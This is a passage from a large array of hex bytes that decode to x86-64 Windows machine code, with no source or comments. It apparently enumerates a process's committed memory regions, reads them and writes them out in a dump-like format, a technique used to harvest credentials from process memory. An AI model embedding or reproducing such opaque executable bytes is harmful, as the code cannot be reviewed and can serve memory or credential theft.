0,0x00,0x48,0x8D,0x05,0x94,0x53,0x00,0x00,0x48,0x89,0x85,0xD8,0x00,0x00,0x00,0x48,0x8D,0x05,0x9C,0x53,0x00,0x00,0x48,0x89,0x85,0xE0,0x00,0x00,0x00,0x48,0x8D,0x05,0xA8,0x53,0x00,0x00,0x48,0x89,0x85,0xE8,0x00,0x00,0x00,0x48,0x8D,0x05,0xAE,0x53,0x00,0x00,0x48,0x89,0x85,0xF0,0x00,0x00,0x00,0x48,0x8D,0x05,0xB6,0x53,0x00,0x00,0x48,0x89,0x85,0xF8,0x00,0x00,0x00,0x48,0x8D,0x05,0xBE,0x53,0x00,0x00,0x48,0x89,0x85,0x00,0x01,0x00,0x00,0x48,0x8D,0x05,0xC6,0x53,0x00,0x00,0x48,0x89,0x85,0x08,0x01,0x00,0x00,0x48,0x8D,0x05,0xD6,0x53,0x00,0x00,0x48,0x89,0x85,0x10,0x01,0x00,0x00,0x48,0x8D,0x05,0xE2,0x53,0x00,0x00,0x48,0x89,0x85,0x18,0x01,0x00,0x00,0x48,0x8D,0x05,0xEC,0x53,0x00,0x00,0x48,0x89,0x85,0x20,0x01,0x00,0x00,0x48,0x8D,0x05,0xF6,0x53,0x00,0x00,0x48,0x89,0x85,0x28,0x01,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x8D,0x95,0xA0,0x00,0x00,0x00,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x12,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF6,0xD3,0xFF,0xFF,0x48,0x89,0x85,0x40,0x01,0x00,0x00,0x48,0x83,0xBD,0x40,0x01,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x05,0x06,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xF6,0x00,0x00,0x00,0x8B,0x85,0x9C,0x00,0x00,0x00,0x83,0xC0,0x01,0x89,0x85,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x50,0x10,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x89,0x90,0x14,0x02,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xC0,0x14,0xBA,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE6,0x23,0x00,0x00,0x89,0x45,0x18,0x8B,0x45,0x18,0x83,0xC0,0x01,0x89,0x45,0x18,0x8B,0x45,0x18,0x01,0xC0,0x89,0x45,0x18,0x48,0x8D,0x55,0x18,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF2,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAA,0x92,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x50,0x05,0x00,0x00,0x8B,0x4D,0x18,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8D,0x50,0x14,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xA5,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5D,0x92,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x03,0x05,0x00,0x00,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0xFC,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x85,0x98,0x00,0x00,0x00,0x48,0x8D,0x95,0x9C,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x04,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2D,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x29,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE5,0x91,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x04,0x00,0x00,0x48,0xC7,0x45,0x20,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x70,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x78,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x7C,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x84,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0xE9,0x9C,0x03,0x00,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x89,0x45,0xA0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x40,0x10,0x89,0x45,0xA8,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x1C,0x02,0x00,0x00,0x89,0x45,0xAC,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x18,0x02,0x00,0x00,0x89,0x45,0xB0,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x8B,0x80,0x14,0x02,0x00,0x00,0x89,0x45,0xB4,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0xC7,0x85,0x3C,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0xA0,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xAC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xB8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xBC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xC8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xCC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xD8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF0,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF4,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x04,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x00,0x48,0x89,0x02,0x83,0x85,0x3C,0x01,0x00,0x00,0x08,0x8B,0x85,0x3C,0x01,0x00,0x00,0x48,0x8D,0x55,0x20,0x48,0x01,0xC2,0x48,0x8B,0x45,0x08,0x48,0x89,0x02,0x48,0x8D,0x55,0x20,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB8,0x6C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x19,0xF2,0xFF,0xFF,0x85,0xC0,0x75,0x26,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0xBA,0x20,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD1,0x8D,0xFF,0xFF,0x48,0xC7,0x85,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7A,0x48,0x8B,0x85,0x48,0x01,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0x48,0x01,0x00,0x00,0x48,0x83,0xBD,0x48,0x01,0x00,0x00,0x00,0x0F,0x85,0x56,0xFC,0xFF,0xFF,0x8B,0x85,0x9C,0x00,0x00,0x00,0x6B,0xC0,0x6C,0x83,0xC0,0x04,0x89,0x45,0x1C,0x48,0x8D,0x55,0x1C,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x30,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x57,0xF1,0xFF,0xFF,0x48,0x8D,0x95,0x98,0x00,0x00,0x00,0x48,0x8B,0x85,0x70,0x01,0x00,0x00,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x34,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x33,0xF1,0xFF,0xFF,0x48,0x8B,0x85,0x40,0x01,0x00,0x00,0x48,0x81,0xC4,0xD8,0x01,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x18,0x48,0x89,0x45,0xF8,0xEB,0x40,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x72,0x24,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x08,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x10,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xB9,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xA0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x90,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x00,0x4C,0x8D,0x45,0x90,0x8B,0x4D,0xDC,0x48,0x8B,0x55,0xF0,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x30,0x00,0x00,0x00,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x84,0xD8,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x88,0x81,0x01,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xA8,0x48,0x89,0x45,0xC8,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xC2,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x0F,0x82,0x5C,0x01,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC8,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x8B,0x45,0xB0,0x3D,0x00,0x10,0x00,0x00,0x0F,0x85,0x18,0x01,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x04,0x00,0x0F,0x84,0x10,0x01,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x01,0x85,0xC0,0x0F,0x85,0x08,0x01,0x00,0x00,0x8B,0x45,0xB4,0x25,0x00,0x01,0x00,0x00,0x85,0xC0,0x0F,0x85,0xFE,0x00,0x00,0x00,0x8B,0x45,0xB4,0x83,0xE0,0x10,0x85,0xC0,0x0F,0x85,0xF6,0x00,0x00,0x00,0x8B,0x45,0xB8,0x3D,0x00,0x00,0x00,0x01,0x75,0x18,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0xD0,0x48,0x89,0xC1,0xE8,0x7B,0xFE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xDA,0x00,0x00,0x00,0x48,0x8B,0x05,0x0E,0xC2,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x28,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x07,0xC2,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xC0,0x48,0x83,0x7D,0xC0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC1,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0xD0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0xC0,0x48,0x8B,0x55,0xC8,0x48,0x89,0x50,0x10,0x8B,0x55,0xB0,0x48,0x8B,0x45,0xC0,0x89,0x50,0x18,0x8B,0x55,0xB4,0x48,0x8B,0x45,0xC0,0x89,0x50,0x1C,0x8B,0x55,0xB8,0x48,0x8B,0x45,0xC0,0x89,0x50,0x20,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF8,0xEB,0x2C,0x48,0x8B,0x45,0xF8,0x48,0x89,0x45,0xE0,0xEB,0x0B,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE9,0x48,0x8B,0x45,0xE0,0x48,0x8B,0x55,0xC0,0x48,0x89,0x10,0x83,0x45,0xEC,0x01,0xE9,0x64,0xFE,0xFF,0xFF,0x90,0xE9,0x5E,0xFE,0xFF,0xFF,0x90,0xE9,0x58,0xFE,0xFF,0xFF,0x90,0xE9,0x52,0xFE,0xFF,0xFF,0x90,0xE9,0x4C,0xFE,0xFF,0xFF,0x90,0xE9,0x46,0xFE,0xFF,0xFF,0x90,0xE9,0x40,0xFE,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x81,0xC4,0xA0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x78,0x48,0x8D,0x6C,0x24,0x70,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x48,0x8B,0x45,0x20,0x8B,0x40,0x10,0x89,0x45,0xE0,0x48,0x8B,0x55,0x28,0x48,0x8B,0x45,0x20,0x48,0x89,0xC1,0xE8,0xB3,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x76,0x03,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xEB,0x17,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xE2,0x48,0x8D,0x55,0xD8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x57,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x12,0x8A,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x09,0x03,0x00,0x00,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x01,0x48,0xC1,0xE0,0x04,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD9,0x89,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xD0,0x02,0x00,0x00,0x48,0x8B,0x45,0xD8,0x83,0xC0,0x01,0xC1,0xE0,0x04,0x89,0x45,0xD4,0x8B,0x45,0xE0,0x89,0xC2,0x8B,0x45,0xD4,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xC8,0x48,0x8D,0x55,0xC8,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC3,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x7E,0x89,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x75,0x02,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x8D,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x75,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x30,0x89,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x27,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8D,0x50,0x10,0x48,0x8B,0x45,0x20,0x41,0xB8,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x34,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x23,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEF,0x88,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE6,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x8D,0x55,0xD4,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x3C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x90,0xEC,0xFF,0xFF,0x48,0x8D,0x55,0xE0,0x48,0x8B,0x45,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x40,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0xEC,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xF8,0xE9,0x78,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x58,0x10,0x48,0x8B,0x05,0xD6,0xBE,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD2,0xBE,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x4D,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x48,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x08,0x49,0x89,0xC2,0x48,0x8B,0x45,0x20,0x48,0x8B,0x00,0x48,0x8B,0x55,0xE8,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0x4C,0x89,0xD2,0x48,0x89,0xC1,0xE8,0xD2,0xD2,0xFF,0xFF,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x10,0xBA,0xFF,0xFF,0xFF,0xFF,0x48,0x39,0xC2,0x73,0x0D,0x48,0x8B,0x45,0xF8,0xBB,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0x58,0x10,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x10,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x20,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xFD,0xEB,0xFF,0xFF,0x85,0xC0,0x75,0x6C,0x48,0x8B,0x45,0xF0,0xBA,0x28,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB8,0x87,0xFF,0xFF,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFC,0x1B,0x00,0x00,0x48,0x8B,0x05,0xED,0xBD,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xED,0xBD,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x66,0x48,0x83,0x7D,0xE8,0x00,0x74,0x45,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x10,0x48,0x8B,0x45,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA9,0x1B,0x00,0x00,0x48,0x8B,0x05,0x9A,0xBD,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9A,0xBD,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x0F,0x85,0x7D,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x78,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xC7,0xEB,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC4,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x98,0xED,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAA,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x7F,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x90,0x00,0x00,0x00,0x48,0x8B,0x